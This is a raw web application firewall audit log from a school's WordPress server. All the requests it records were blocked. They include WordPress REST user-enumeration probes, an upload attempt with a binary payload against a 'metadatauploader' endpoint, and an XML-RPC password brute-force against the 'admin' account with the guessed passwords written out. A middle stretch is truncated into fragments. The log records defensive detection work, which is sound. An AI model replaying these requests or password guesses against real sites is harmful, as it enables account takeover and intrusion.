[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174761829702 3417 (- - -) Stopwatch2: 1749174761829702 3417; combined=1458, p1=489, p2=937, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27376535-Z-- --7eb1935a-A-- [06/Jun/2025:08:57:55 +0700] aEJLI2aFzeU7VUj_TDF08gAAAAc 103.236.140.4 50632 103.236.140.4 8181 --7eb1935a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.213.133.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.213.133.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7eb1935a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7eb1935a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749175075941818 3202 (- - -) Stopwatch2: 1749175075941818 3202; combined=1377, p1=454, p2=893, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7eb1935a-Z-- --4e44632d-A-- [06/Jun/2025:09:04:26 +0700] aEJMqtKrQJH3faNNWWAYowAAAM0 103.236.140.4 51770 103.236.140.4 8181 --4e44632d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.80.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.80.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e44632d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e44632d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749175466929945 2613 (- - -) Stopwatch2: 1749175466929945 2613; combined=1264, p1=459, p2=776, p3=0, p4=0, p5=29, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e44632d-Z-- --c760db26-A-- [06/Jun/2025:09:44:56 +0700] aEJWKIpHVOr-3zoVB37GaAAAAQw 103.236.140.4 41532 103.236.140.4 8181 --c760db26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.240.233.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.240.233.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c760db26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c760db26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749177896474409 3512 (- - -) Stopwatch2: 1749177896474409 3512; combined=1517, p1=466, p2=1019, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c760db26-Z-- --97b32f2d-A-- [06/Jun/2025:09:52:11 +0700] aEJX24pHVOr-3zoVB37G5gAAAQw 103.236.140.4 44812 103.236.140.4 8181 --97b32f2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 50.6.171.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 50.6.171.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97b32f2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97b32f2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749178331172160 3332 (- - -) Stopwatch2: 1749178331172160 3332; combined=1437, p1=455, p2=952, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97b32f2d-Z-- --6117254b-A-- [06/Jun/2025:09:55:23 +0700] aEJYm_HwHPygw9BuFzQ6TAAAAIw 103.236.140.4 46258 103.236.140.4 8181 --6117254b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.220.221.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.220.221.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6117254b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6117254b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749178523851840 3123 (- - -) Stopwatch2: 1749178523851840 3123; combined=1362, p1=500, p2=834, p3=0, p4=0, p5=28, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6117254b-Z-- --8bcf3210-A-- [06/Jun/2025:10:06:12 +0700] aEJbJOJsrKcXA4Tjex0NOQAAAEw 103.236.140.4 51060 103.236.140.4 8181 --8bcf3210-B-- POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.90.153.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.90.153.48 X-Forwarded-Proto: http Connection: close Content-Length: 520 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 Content-Type: multipart/form-data --8bcf3210-C-- PK .propertiesœÑËjAà“¹N ^2’…;Y¦Û€™ž1xCéhˆ îb9]ÝÕ±º«ò×ß±ÌÂÇÂ\‰/ [×Ùú‚ÒcãàN<«Spø øßGß.‰Ö\èpŸŒ•Ä…tãÕ/§vxë] ‚Tf¢ÖìkI³Žšu4_o{Â`ÎÜN±x¡åàã…õ«Î>tÑÙŲ6"ÝS64Á+’Nz{ûšt_ú:Œó–Ì‘œòF%¸&é—þö÷„í/~ûôyíù×ÒWfúE ް2Ã*ÉáÓƒäíz<¼ò㌺Xœ P©{&•ô¬!N°$jV† ~ÍXýý}-ª --e4d4326a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4d4326a-E-- --e4d4326a-H-- Message: Access denied with code 403 (phase 2). String match " --672e4e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --672e4e3d-E-- --672e4e3d-H-- Message: Access denied with code 403 (phase 2). 
String match " --8e439d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e439d79-E-- --8e439d79-H-- Message: Access denied with code 403 (phase 2). String match " --9b0f5c04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b0f5c04-H-- Message: Access denied with code 403 (phase 2). String match " --d0d30f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d30f13-E-- --d0d30f13-H-- Message: Access denied with code 403 (phase 2). String match " --75886a19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75886a19-E-- --75886a19-H-- Message: Access denied with code 403 (phase 2). String match " --9a323850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a323850-H-- Message: Access denied with code 403 (phase 2). String match " --9016b012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9016b012-E-- --9016b012-H-- Message: Access denied with code 403 (phase 2). String match " wp.getUsersBlogs admin 12345678 --27d51534-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d51534-E-- --27d51534-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283281608484 5306 (- - -) Stopwatch2: 1749283281608484 5306; combined=3784, p1=429, p2=3197, p3=0, p4=0, p5=94, sr=86, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d51534-Z-- --115b9e72-A-- [07/Jun/2025:15:02:22 +0700] aEPyDmCOO9DrcKL2J_7qwAAAANM 103.236.140.4 35388 103.236.140.4 8181 --115b9e72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --115b9e72-C-- wp.getUsersBlogs admin admin888 --115b9e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --115b9e72-E-- --115b9e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283342702583 4384 (- - -) Stopwatch2: 1749283342702583 4384; combined=3096, p1=401, p2=2550, p3=0, p4=0, p5=85, sr=80, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115b9e72-Z-- --461b6832-A-- [07/Jun/2025:15:03:22 +0700] aEPySpANhDjQAvBdMyHMLQAAAIU 103.236.140.4 37098 103.236.140.4 8181 --461b6832-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --461b6832-C-- wp.getUsersBlogs admin admin1988 --461b6832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461b6832-E-- --461b6832-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283402196608 5676 (- - -) Stopwatch2: 1749283402196608 5676; combined=4016, p1=460, p2=3360, p3=0, p4=0, p5=115, sr=87, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461b6832-Z-- --1fec4a32-A-- [07/Jun/2025:15:04:24 +0700] aEPyh5ANhDjQAvBdMyHMygAAAJg 103.236.140.4 39138 103.236.140.4 8181 --1fec4a32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1fec4a32-C-- wp.getUsersBlogs admin du7p72w5 --1fec4a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fec4a32-E-- --1fec4a32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283463998364 5294 (- - -) Stopwatch2: 1749283463998364 5294; combined=3713, p1=448, p2=3086, p3=0, p4=0, p5=104, sr=79, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fec4a32-Z-- --c3443b6c-A-- [07/Jun/2025:15:05:23 +0700] aEPywxK9gc79coX6mHR8jAAAAEc 103.236.140.4 41144 103.236.140.4 8181 --c3443b6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3443b6c-C-- wp.getUsersBlogs admin poohbear --c3443b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3443b6c-E-- --c3443b6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283523615343 5337 (- - -) Stopwatch2: 1749283523615343 5337; combined=3814, p1=461, p2=3174, p3=0, p4=0, p5=107, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3443b6c-Z-- --81bb9d5f-A-- [07/Jun/2025:15:06:23 +0700] aEPy_2COO9DrcKL2J_7sBwAAANc 103.236.140.4 43226 103.236.140.4 8181 --81bb9d5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81bb9d5f-C-- wp.getUsersBlogs admin marketing2020 --81bb9d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81bb9d5f-E-- --81bb9d5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283583214630 5282 (- - -) Stopwatch2: 1749283583214630 5282; combined=3814, p1=458, p2=3166, p3=0, p4=0, p5=110, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81bb9d5f-Z-- --304fd02e-A-- [07/Jun/2025:15:07:23 +0700] aEPzOxK9gc79coX6mHR9vAAAAEo 103.236.140.4 45468 103.236.140.4 8181 --304fd02e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --304fd02e-C-- wp.getUsersBlogs admin smkn22-jkt-sch-id123 --304fd02e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --304fd02e-E-- --304fd02e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283643196650 4958 (- - -) Stopwatch2: 1749283643196650 4958; combined=3975, p1=444, p2=3227, p3=0, p4=0, p5=172, sr=86, sw=132, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304fd02e-Z-- --b7d43911-A-- [07/Jun/2025:15:08:23 +0700] aEPzdxK9gc79coX6mHR-XAAAAEw 103.236.140.4 47534 103.236.140.4 8181 --b7d43911-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b7d43911-C-- wp.getUsersBlogs admin superadmin --b7d43911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d43911-E-- --b7d43911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283703153162 5442 (- - -) Stopwatch2: 1749283703153162 5442; combined=3941, p1=482, p2=3203, p3=0, p4=0, p5=142, sr=90, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d43911-Z-- --61bb105b-A-- [07/Jun/2025:15:09:27 +0700] aEPzt2COO9DrcKL2J_7tyQAAANE 103.236.140.4 49572 103.236.140.4 8181 --61bb105b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --61bb105b-C-- wp.getUsersBlogs admin !null! --61bb105b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61bb105b-E-- --61bb105b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283767619916 4905 (- - -) Stopwatch2: 1749283767619916 4905; combined=3816, p1=461, p2=3169, p3=0, p4=0, p5=108, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61bb105b-Z-- --2c18053e-A-- [07/Jun/2025:15:10:27 +0700] aEPz8_ClubEPOra_8Un-FAAAAAo 103.236.140.4 51436 103.236.140.4 8181 --2c18053e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2c18053e-C-- wp.getUsersBlogs admin work123 --2c18053e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 